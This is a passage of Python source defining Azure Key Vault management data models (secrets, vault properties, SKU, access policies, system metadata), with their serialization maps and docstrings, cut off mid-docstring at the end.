        self, *, properties: "_models.SecretProperties", **kwargs: Any
    ) -> None:
        """
        :keyword properties: Properties of the secret. Required.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
        """
        super().__init__(**kwargs)
        self.properties = properties
class SecretAttributes(Attributes):
    """The secret management attributes.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar enabled: Determines whether the object is enabled.
    :vartype enabled: bool
    :ivar not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
    :vartype not_before: ~datetime.datetime
    :ivar expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
    :vartype expires: ~datetime.datetime
    :ivar created: Creation time in seconds since 1970-01-01T00:00:00Z.
    :vartype created: ~datetime.datetime
    :ivar updated: Last updated time in seconds since 1970-01-01T00:00:00Z.
    :vartype updated: ~datetime.datetime
    """

    # created/updated are stamped by the service and cannot be set by callers.
    _validation = {
        "created": {"readonly": True},
        "updated": {"readonly": True},
    }

    # Timestamps travel on the wire as Unix epoch seconds (nbf/exp/...).
    _attribute_map = {
        "enabled": {"key": "enabled", "type": "bool"},
        "not_before": {"key": "nbf", "type": "unix-time"},
        "expires": {"key": "exp", "type": "unix-time"},
        "created": {"key": "created", "type": "unix-time"},
        "updated": {"key": "updated", "type": "unix-time"},
    }

    def __init__(
        self,
        *,
        enabled: Optional[bool] = None,
        not_before: Optional[datetime.datetime] = None,
        expires: Optional[datetime.datetime] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword enabled: Determines whether the object is enabled.
        :paramtype enabled: bool
        :keyword not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
        :paramtype not_before: ~datetime.datetime
        :keyword expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
        :paramtype expires: ~datetime.datetime
        """
        # All writable state lives on the Attributes base class.
        super().__init__(enabled=enabled, not_before=not_before, expires=expires, **kwargs)
class SecretCreateOrUpdateParameters(_serialization.Model):
    """Parameters for creating or updating a secret.

    All required parameters must be populated in order to send to Azure.

    :ivar tags: The tags that will be assigned to the secret.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the secret. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
    """

    _validation = {
        "properties": {"required": True},
    }

    _attribute_map = {
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "SecretProperties"},
    }

    def __init__(
        self,
        *,
        properties: "_models.SecretProperties",
        tags: Optional[Dict[str, str]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword tags: The tags that will be assigned to the secret.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the secret. Required.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
        """
        super().__init__(**kwargs)
        # "properties" is mandatory; "tags" may be omitted entirely.
        self.properties = properties
        self.tags = tags
class SecretListResult(_serialization.Model):
    """List of secrets.

    :ivar value: The list of secrets.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Secret]
    :ivar next_link: The URL to get the next set of secrets.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[Secret]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.Secret"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The list of secrets.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Secret]
        :keyword next_link: The URL to get the next set of secrets.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        # A missing next_link means there are no further pages to fetch.
        self.next_link = next_link
        self.value = value
class SecretPatchParameters(_serialization.Model):
    """Parameters for patching a secret.

    :ivar tags: The tags that will be assigned to the secret.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the secret.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretPatchProperties
    """

    # No _validation block: every field of a PATCH payload is optional.
    _attribute_map = {
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "SecretPatchProperties"},
    }

    def __init__(
        self,
        *,
        tags: Optional[Dict[str, str]] = None,
        properties: Optional["_models.SecretPatchProperties"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword tags: The tags that will be assigned to the secret.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the secret.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretPatchProperties
        """
        super().__init__(**kwargs)
        self.properties = properties
        self.tags = tags
class SecretPatchProperties(_serialization.Model):
    """Properties of the secret.

    :ivar value: The value of the secret.
    :vartype value: str
    :ivar content_type: The content type of the secret.
    :vartype content_type: str
    :ivar attributes: The attributes of the secret.
    :vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
    """

    _attribute_map = {
        "value": {"key": "value", "type": "str"},
        "content_type": {"key": "contentType", "type": "str"},
        "attributes": {"key": "attributes", "type": "SecretAttributes"},
    }

    def __init__(
        self,
        *,
        value: Optional[str] = None,
        content_type: Optional[str] = None,
        attributes: Optional["_models.SecretAttributes"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The value of the secret.
        :paramtype value: str
        :keyword content_type: The content type of the secret.
        :paramtype content_type: str
        :keyword attributes: The attributes of the secret.
        :paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
        """
        super().__init__(**kwargs)
        # All fields optional — omitted ones are left unchanged by the PATCH.
        self.attributes = attributes
        self.content_type = content_type
        self.value = value
class SecretProperties(_serialization.Model):
    """Properties of the secret.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar value: The value of the secret. NOTE: 'value' will never be returned from the service, as
     APIs using this model are intended for internal use in ARM deployments. Users should use the
     data-plane REST service for interaction with vault secrets.
    :vartype value: str
    :ivar content_type: The content type of the secret.
    :vartype content_type: str
    :ivar attributes: The attributes of the secret.
    :vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
    :ivar secret_uri: The URI to retrieve the current version of the secret.
    :vartype secret_uri: str
    :ivar secret_uri_with_version: The URI to retrieve the specific version of the secret.
    :vartype secret_uri_with_version: str
    """

    # The two URI fields are computed by the service; they are never sent.
    _validation = {
        "secret_uri": {"readonly": True},
        "secret_uri_with_version": {"readonly": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "str"},
        "content_type": {"key": "contentType", "type": "str"},
        "attributes": {"key": "attributes", "type": "SecretAttributes"},
        "secret_uri": {"key": "secretUri", "type": "str"},
        "secret_uri_with_version": {"key": "secretUriWithVersion", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[str] = None,
        content_type: Optional[str] = None,
        attributes: Optional["_models.SecretAttributes"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The value of the secret. NOTE: 'value' will never be returned from the
         service, as APIs using this model are intended for internal use in ARM deployments. Users
         should use the data-plane REST service for interaction with vault secrets.
        :paramtype value: str
        :keyword content_type: The content type of the secret.
        :paramtype content_type: str
        :keyword attributes: The attributes of the secret.
        :paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
        """
        super().__init__(**kwargs)
        self.value = value
        self.content_type = content_type
        self.attributes = attributes
        # Read-only fields: initialized to None; filled in by deserialization.
        self.secret_uri = None
        self.secret_uri_with_version = None
class ServiceSpecification(_serialization.Model):
    """One property of operation, include log specifications.

    :ivar log_specifications: Log specifications of operation.
    :vartype log_specifications: list[~azure.mgmt.keyvault.v2021_10_01.models.LogSpecification]
    :ivar metric_specifications: Metric specifications of operation.
    :vartype metric_specifications:
     list[~azure.mgmt.keyvault.v2021_10_01.models.MetricSpecification]
    """

    _attribute_map = {
        "log_specifications": {"key": "logSpecifications", "type": "[LogSpecification]"},
        "metric_specifications": {"key": "metricSpecifications", "type": "[MetricSpecification]"},
    }

    def __init__(
        self,
        *,
        log_specifications: Optional[List["_models.LogSpecification"]] = None,
        metric_specifications: Optional[List["_models.MetricSpecification"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword log_specifications: Log specifications of operation.
        :paramtype log_specifications: list[~azure.mgmt.keyvault.v2021_10_01.models.LogSpecification]
        :keyword metric_specifications: Metric specifications of operation.
        :paramtype metric_specifications:
         list[~azure.mgmt.keyvault.v2021_10_01.models.MetricSpecification]
        """
        super().__init__(**kwargs)
        # Both specification lists are independent and individually optional.
        self.metric_specifications = metric_specifications
        self.log_specifications = log_specifications
class Sku(_serialization.Model):
    """SKU details.

    All required parameters must be populated in order to send to Azure.

    :ivar family: SKU family name. "A"
    :vartype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuFamily
    :ivar name: SKU name to specify whether the key vault is a standard vault or a premium vault.
     Required. Known values are: "standard" and "premium".
    :vartype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuName
    """

    _validation = {
        "family": {"required": True},
        "name": {"required": True},
    }

    _attribute_map = {
        "family": {"key": "family", "type": "str"},
        "name": {"key": "name", "type": "str"},
    }

    # NOTE: parameters are keyword-only, so "family" carrying a default ("A",
    # the only known family) ahead of the required "name" is valid syntax.
    def __init__(
        self,
        *,
        family: Union[str, "_models.SkuFamily"] = "A",
        name: Union[str, "_models.SkuName"],
        **kwargs: Any
    ) -> None:
        """
        :keyword family: SKU family name. "A"
        :paramtype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuFamily
        :keyword name: SKU name to specify whether the key vault is a standard
         vault or a premium vault. Required. Known values are: "standard" and "premium".
        :paramtype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuName
        """
        super().__init__(**kwargs)
        self.name = name
        self.family = family
class SystemData(_serialization.Model):
    """Metadata pertaining to creation and last modification of the key vault resource.

    :ivar created_by: The identity that created the key vault resource.
    :vartype created_by: str
    :ivar created_by_type: The type of identity that created the key vault resource. Known values
     are: "User", "Application", "ManagedIdentity", and "Key".
    :vartype created_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
    :ivar created_at: The timestamp of the key vault resource creation (UTC).
    :vartype created_at: ~datetime.datetime
    :ivar last_modified_by: The identity that last modified the key vault resource.
    :vartype last_modified_by: str
    :ivar last_modified_by_type: The type of identity that last modified the key vault resource.
     Known values are: "User", "Application", "ManagedIdentity", and "Key".
    :vartype last_modified_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
    :ivar last_modified_at: The timestamp of the key vault resource last modification (UTC).
    :vartype last_modified_at: ~datetime.datetime
    """

    # Timestamps are serialized as ISO-8601 strings on the wire.
    _attribute_map = {
        "created_by": {"key": "createdBy", "type": "str"},
        "created_by_type": {"key": "createdByType", "type": "str"},
        "created_at": {"key": "createdAt", "type": "iso-8601"},
        "last_modified_by": {"key": "lastModifiedBy", "type": "str"},
        "last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
        "last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
    }

    def __init__(
        self,
        *,
        created_by: Optional[str] = None,
        created_by_type: Optional[Union[str, "_models.IdentityType"]] = None,
        created_at: Optional[datetime.datetime] = None,
        last_modified_by: Optional[str] = None,
        last_modified_by_type: Optional[Union[str, "_models.IdentityType"]] = None,
        last_modified_at: Optional[datetime.datetime] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword created_by: The identity that created the key vault resource.
        :paramtype created_by: str
        :keyword created_by_type: The type of identity that created the key vault resource. Known
         values are: "User", "Application", "ManagedIdentity", and "Key".
        :paramtype created_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
        :keyword created_at: The timestamp of the key vault resource creation (UTC).
        :paramtype created_at: ~datetime.datetime
        :keyword last_modified_by: The identity that last modified the key vault resource.
        :paramtype last_modified_by: str
        :keyword last_modified_by_type: The type of identity that last modified the key vault
         resource. Known values are: "User", "Application", "ManagedIdentity", and "Key".
        :paramtype last_modified_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
        :keyword last_modified_at: The timestamp of the key vault resource last modification (UTC).
        :paramtype last_modified_at: ~datetime.datetime
        """
        super().__init__(**kwargs)
        # "last modified" triple first, then the "created" triple — the two
        # groups are independent.
        self.last_modified_by = last_modified_by
        self.last_modified_by_type = last_modified_by_type
        self.last_modified_at = last_modified_at
        self.created_by = created_by
        self.created_by_type = created_by_type
        self.created_at = created_at
class Vault(_serialization.Model):
    """Resource information with extended details.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified identifier of the key vault resource.
    :vartype id: str
    :ivar name: Name of the key vault resource.
    :vartype name: str
    :ivar type: Resource type of the key vault resource.
    :vartype type: str
    :ivar location: Azure location of the key vault resource.
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource.
    :vartype tags: dict[str, str]
    :ivar system_data: System metadata for the key vault.
    :vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
    :ivar properties: Properties of the vault. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
    """

    # id/name/type/system_data are server-assigned; "properties" is the one
    # field a caller must always supply.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "system_data": {"readonly": True},
        "properties": {"required": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "system_data": {"key": "systemData", "type": "SystemData"},
        "properties": {"key": "properties", "type": "VaultProperties"},
    }

    def __init__(
        self,
        *,
        properties: "_models.VaultProperties",
        location: Optional[str] = None,
        tags: Optional[Dict[str, str]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: Azure location of the key vault resource.
        :paramtype location: str
        :keyword tags: Tags assigned to the key vault resource.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the vault. Required.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
        """
        super().__init__(**kwargs)
        # Caller-supplied state first ...
        self.properties = properties
        self.location = location
        self.tags = tags
        # ... then the read-only fields, populated on deserialization.
        self.id = None
        self.name = None
        self.type = None
        self.system_data = None
class VaultAccessPolicyParameters(_serialization.Model):
    """Parameters for updating the access policy in a vault.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: The resource id of the access policy.
    :vartype id: str
    :ivar name: The resource name of the access policy.
    :vartype name: str
    :ivar type: The resource type of the access policy.
    :vartype type: str
    :ivar location: The Azure location of the access policy.
    :vartype location: str
    :ivar properties: Properties of the access policy. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultAccessPolicyProperties
    """

    # id/name/type/location are server-populated; only "properties" is sent.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "properties": {"required": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "properties": {"key": "properties", "type": "VaultAccessPolicyProperties"},
    }

    def __init__(self, *, properties: "_models.VaultAccessPolicyProperties", **kwargs: Any) -> None:
        """
        :keyword properties: Properties of the access policy. Required.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultAccessPolicyProperties
        """
        super().__init__(**kwargs)
        # Read-only fields start as None and are filled in by deserialization.
        self.id = None
        self.name = None
        self.type = None
        self.location = None
        self.properties = properties
class VaultAccessPolicyProperties(_serialization.Model):
    """Properties of the vault access policy.

    All required parameters must be populated in order to send to Azure.

    :ivar access_policies: An array of 0 to 16 identities that have access to the key vault. All
     identities in the array must use the same tenant ID as the key vault's tenant ID. Required.
    :vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
    """

    _validation = {
        "access_policies": {"required": True},
    }

    _attribute_map = {
        "access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
    }

    def __init__(
        self, *, access_policies: List["_models.AccessPolicyEntry"], **kwargs: Any
    ) -> None:
        """
        :keyword access_policies: An array of 0 to 16 identities that have access to the key vault.
         All identities in the array must use the same tenant ID as the key vault's tenant ID.
         Required.
        :paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
        """
        super().__init__(**kwargs)
        self.access_policies = access_policies
class VaultCheckNameAvailabilityParameters(_serialization.Model):
    """The parameters used to check the availability of the vault name.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar name: The vault name. Required.
    :vartype name: str
    :ivar type: The type of resource, Microsoft.KeyVault/vaults. Required. Default value is
     "Microsoft.KeyVault/vaults".
    :vartype type: str
    """

    _validation = {
        "name": {"required": True},
        "type": {"required": True, "constant": True},
    }

    _attribute_map = {
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
    }

    # "type" is a constant for this request shape: it is fixed at the class
    # level and deliberately not accepted by __init__.
    type = "Microsoft.KeyVault/vaults"

    def __init__(self, *, name: str, **kwargs: Any) -> None:
        """
        :keyword name: The vault name. Required.
        :paramtype name: str
        """
        super().__init__(**kwargs)
        self.name = name
class VaultCreateOrUpdateParameters(_serialization.Model):
    """Parameters for creating or updating a vault.

    All required parameters must be populated in order to send to Azure.

    :ivar location: The supported Azure location where the key vault should be created. Required.
    :vartype location: str
    :ivar tags: The tags that will be assigned to the key vault.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the vault. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
    """

    # Unlike the PATCH shape, both location and properties are mandatory here.
    _validation = {
        "location": {"required": True},
        "properties": {"required": True},
    }

    _attribute_map = {
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "VaultProperties"},
    }

    def __init__(
        self,
        *,
        location: str,
        properties: "_models.VaultProperties",
        tags: Optional[Dict[str, str]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: The supported Azure location where the key vault should be created.
         Required.
        :paramtype location: str
        :keyword tags: The tags that will be assigned to the key vault.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the vault. Required.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
        """
        super().__init__(**kwargs)
        self.properties = properties
        self.location = location
        self.tags = tags
class VaultListResult(_serialization.Model):
    """List of vaults.

    :ivar value: The list of vaults.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Vault]
    :ivar next_link: The URL to get the next set of vaults.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[Vault]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.Vault"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The list of vaults.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Vault]
        :keyword next_link: The URL to get the next set of vaults.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        # An absent next_link indicates the final page of results.
        self.next_link = next_link
        self.value = value
class VaultPatchParameters(_serialization.Model):
    """Parameters for creating or updating a vault.

    :ivar tags: The tags that will be assigned to the key vault.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the vault.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultPatchProperties
    """

    # PATCH shape: everything optional, no _validation block.
    _attribute_map = {
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "VaultPatchProperties"},
    }

    def __init__(
        self,
        *,
        tags: Optional[Dict[str, str]] = None,
        properties: Optional["_models.VaultPatchProperties"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword tags: The tags that will be assigned to the key vault.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the vault.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultPatchProperties
        """
        super().__init__(**kwargs)
        self.properties = properties
        self.tags = tags
class VaultPatchProperties(_serialization.Model):  # pylint: disable=too-many-instance-attributes
    """Properties of the vault.

    :ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
     requests to the key vault.
    :vartype tenant_id: str
    :ivar sku: SKU details.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
    :ivar access_policies: An array of 0 to 16 identities that have access to the key vault. All
     identities in the array must use the same tenant ID as the key vault's tenant ID.
    :vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
    :ivar enabled_for_deployment: Property to specify whether Azure Virtual Machines are permitted
     to retrieve certificates stored as secrets from the key vault.
    :vartype enabled_for_deployment: bool
    :ivar enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
     permitted to retrieve secrets from the vault and unwrap keys.
    :vartype enabled_for_disk_encryption: bool
    :ivar enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
     permitted to retrieve secrets from the key vault.
    :vartype enabled_for_template_deployment: bool
    :ivar enable_soft_delete: Property to specify whether the 'soft delete' functionality is
     enabled for this key vault. Once set to true, it cannot be reverted to false.
    :vartype enable_soft_delete: bool
    :ivar enable_rbac_authorization: Property that controls how data actions are authorized. When
     true, the key vault will use Role Based Access Control (RBAC) for authorization of data
     actions, and the access policies specified in vault properties will be ignored. When false,
     the key vault will use the access policies specified in vault properties, and any policy stored
     on Azure Resource Manager will be ignored. If null or not specified, the value of this property
     will not change.
    :vartype enable_rbac_authorization: bool
    :ivar soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and <=90.
    :vartype soft_delete_retention_in_days: int
    :ivar create_mode: The vault's create mode to indicate whether the vault need to be recovered
     or not. Known values are: "recover" and "default".
    :vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
    :ivar enable_purge_protection: Property specifying whether protection against purge is enabled
     for this vault. Setting this property to true activates protection against purge for this vault
     and its content - only the Key Vault service may initiate a hard, irrecoverable deletion. The
     setting is effective only if soft delete is also enabled. Enabling this functionality is
     irreversible - that is, the property does not accept false as its value.
    :vartype enable_purge_protection: bool
    :ivar network_acls: A collection of rules governing the accessibility of the vault from
     specific network locations.
    :vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
    :ivar public_network_access: Property to specify whether the vault will accept traffic from
     public internet. If set to 'disabled' all traffic except private endpoint traffic and traffic
     that originates from trusted services will be blocked. This will override the set firewall
     rules, meaning that even if the firewall rules are present we will not honor the rules.
    :vartype public_network_access: str
    """

    # PATCH shape: no _validation block, every field is optional; omitted
    # fields leave the corresponding vault setting unchanged.
    _attribute_map = {
        "tenant_id": {"key": "tenantId", "type": "str"},
        "sku": {"key": "sku", "type": "Sku"},
        "access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
        "enabled_for_deployment": {"key": "enabledForDeployment", "type": "bool"},
        "enabled_for_disk_encryption": {"key": "enabledForDiskEncryption", "type": "bool"},
        "enabled_for_template_deployment": {"key": "enabledForTemplateDeployment", "type": "bool"},
        "enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
        "enable_rbac_authorization": {"key": "enableRbacAuthorization", "type": "bool"},
        "soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
        "create_mode": {"key": "createMode", "type": "str"},
        "enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
        "network_acls": {"key": "networkAcls", "type": "NetworkRuleSet"},
        "public_network_access": {"key": "publicNetworkAccess", "type": "str"},
    }

    def __init__(
        self,
        *,
        tenant_id: Optional[str] = None,
        sku: Optional["_models.Sku"] = None,
        access_policies: Optional[List["_models.AccessPolicyEntry"]] = None,
        enabled_for_deployment: Optional[bool] = None,
        enabled_for_disk_encryption: Optional[bool] = None,
        enabled_for_template_deployment: Optional[bool] = None,
        enable_soft_delete: Optional[bool] = None,
        enable_rbac_authorization: Optional[bool] = None,
        soft_delete_retention_in_days: Optional[int] = None,
        create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
        enable_purge_protection: Optional[bool] = None,
        network_acls: Optional["_models.NetworkRuleSet"] = None,
        public_network_access: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
         requests to the key vault.
        :paramtype tenant_id: str
        :keyword sku: SKU details.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
        :keyword access_policies: An array of 0 to 16 identities that have access to the key vault. All
         identities in the array must use the same tenant ID as the key vault's tenant ID.
        :paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
        :keyword enabled_for_deployment: Property to specify whether Azure Virtual Machines are
         permitted to retrieve certificates stored as secrets from the key vault.
        :paramtype enabled_for_deployment: bool
        :keyword enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
         permitted to retrieve secrets from the vault and unwrap keys.
        :paramtype enabled_for_disk_encryption: bool
        :keyword enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
         permitted to retrieve secrets from the key vault.
        :paramtype enabled_for_template_deployment: bool
        :keyword enable_soft_delete: Property to specify whether the 'soft delete' functionality is
         enabled for this key vault. Once set to true, it cannot be reverted to false.
        :paramtype enable_soft_delete: bool
        :keyword enable_rbac_authorization: Property that controls how data actions are authorized.
         When true, the key vault will use Role Based Access Control (RBAC) for authorization of data
         actions, and the access policies specified in vault properties will be ignored. When false,
         the key vault will use the access policies specified in vault properties, and any policy stored
         on Azure Resource Manager will be ignored. If null or not specified, the value of this property
         will not change.
        :paramtype enable_rbac_authorization: bool
        :keyword soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and
         <=90.
        :paramtype soft_delete_retention_in_days: int
        :keyword create_mode: The vault's create mode to indicate whether the vault need to be
         recovered or not. Known values are: "recover" and "default".
        :paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
        :keyword enable_purge_protection: Property specifying whether protection against purge is
         enabled for this vault. Setting this property to true activates protection against purge for
         this vault and its content - only the Key Vault service may initiate a hard, irrecoverable
         deletion. The setting is effective only if soft delete is also enabled. Enabling this
         functionality is irreversible - that is, the property does not accept false as its value.
        :paramtype enable_purge_protection: bool
        :keyword network_acls: A collection of rules governing the accessibility of the vault from
         specific network locations.
        :paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
        :keyword public_network_access: Property to specify whether the vault will accept traffic from
         public internet. If set to 'disabled' all traffic except private endpoint traffic and traffic
         that originates from trusted services will be blocked. This will override the set firewall
         rules, meaning that even if the firewall rules are present we will not honor the rules.
        :paramtype public_network_access: str
        """
        super().__init__(**kwargs)
        self.tenant_id = tenant_id
        self.sku = sku
        self.access_policies = access_policies
        self.enabled_for_deployment = enabled_for_deployment
        self.enabled_for_disk_encryption = enabled_for_disk_encryption
        self.enabled_for_template_deployment = enabled_for_template_deployment
        self.enable_soft_delete = enable_soft_delete
        self.enable_rbac_authorization = enable_rbac_authorization
        self.soft_delete_retention_in_days = soft_delete_retention_in_days
        self.create_mode = create_mode
        self.enable_purge_protection = enable_purge_protection
        self.network_acls = network_acls
        self.public_network_access = public_network_access
class VaultProperties(_serialization.Model): # pylint: disable=too-many-instance-attributes
    """Properties of the vault.

    Variables are only populated by the server, and will be ignored when sending a request.
    All required parameters must be populated in order to send to Azure.

    :ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
     requests to the key vault. Required.
    :vartype tenant_id: str
    :ivar sku: SKU details. Required.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
    :ivar access_policies: An array of 0 to 1024 identities that have access to the key vault. All
     identities in the array must use the same tenant ID as the key vault's tenant ID. When
     ``createMode`` is set to ``recover``\ , access policies are not required. Otherwise, access
     policies are required.
    :vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
    :ivar vault_uri: The URI of the vault for performing operations on keys and secrets.
    :vartype vault_uri: str
    :ivar hsm_pool_resource_id: The resource id of HSM Pool.
    :vartype hsm_pool_resource_id: str
    :ivar enabled_for_deployment: Property to specify whether Azure Virtual Machines are permitted
     to retrieve certificates stored as secrets from the key vault.
    :vartype enabled_for_deployment: bool
    :ivar enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
     permitted to retrieve secrets from the vault and unwrap keys.
    :vartype enabled_for_disk_encryption: bool
    :ivar enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
     permitted to retrieve secrets from the key vault.
    :vartype enabled_for_template_deployment: bool
    :ivar enable_soft_delete: Property to specify whether the 'soft delete' functionality is
     enabled for this key vault. If it's not set to any value(true or false) when creating new key
     vault, it will be set to true by default. Once set to true, it cannot be reverted to false.
    :vartype enable_soft_delete: bool
    :ivar soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and <=90.
    :vartype soft_delete_retention_in_days: int
    :ivar enable_rbac_authorization: Property that controls how data actions are authorized. When
     true, the key vault will use Role Based Access Control (RBAC) for authorization of data
     actions, and the access policies specified in vault properties will be ignored. When false,
     the key vault will use the access policies specified in vault properties, and any policy stored
     on Azure Resource Manager will be ignored. If null or not specified, the vault is created with
     the default value of false. Note that management actions are always authorized with RBAC.
    :vartype enable_rbac_authorization: bool
    :ivar create_mode: The vault's create mode to indicate whether the vault need to be recovered
     or not. Known values are: "recover" and "default".
    :vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
    :ivar enable_purge_protection: Property specifying whether protection against purge is enabled
     for this vault. Setting this property to true activates protection against purge for this vault
     and its content - only the Key Vault service may initiate a hard, irrecoverable deletion. The
